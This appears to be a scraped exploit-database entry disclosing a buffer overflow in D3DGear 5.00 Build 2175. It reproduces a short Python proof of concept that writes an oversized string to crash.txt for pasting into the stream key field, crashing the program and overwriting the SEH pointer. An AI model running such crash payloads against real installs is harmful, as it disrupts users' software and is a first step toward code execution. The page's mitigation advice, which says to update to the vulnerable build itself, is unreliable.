header-logo
Suggest Exploit
vendor:
D3DGear
by:
bzyo
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: D3DGear
Affected Version From: 5.00 Build 2175
Affected Version To: 5.00 Build 2175
Patch Exists: Yes
Related CWE: N/A
CPE: a:d3dgear:d3dgear:5.00_build_2175
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86
2017

D3DGear 5.00 Build 2175 – Buffer Overflow

A buffer overflow vulnerability exists in D3DGear 5.00 Build 2175, which can be exploited by generating a crash.txt file, opening the program, selecting broadcast, and pasting the crash.txt contents in the stream key. The application crashes, with a 00420042 pointer to the next SEH record, but no EIP overwrite, and one unicode PPR pointer.

Mitigation:

Update to the latest version of D3DGear 5.00 Build 2175.
Source

Exploit-DB raw data:

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#
  
file = "crash.txt"

buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()

Navigation

Suggest Exploit

Services By CQR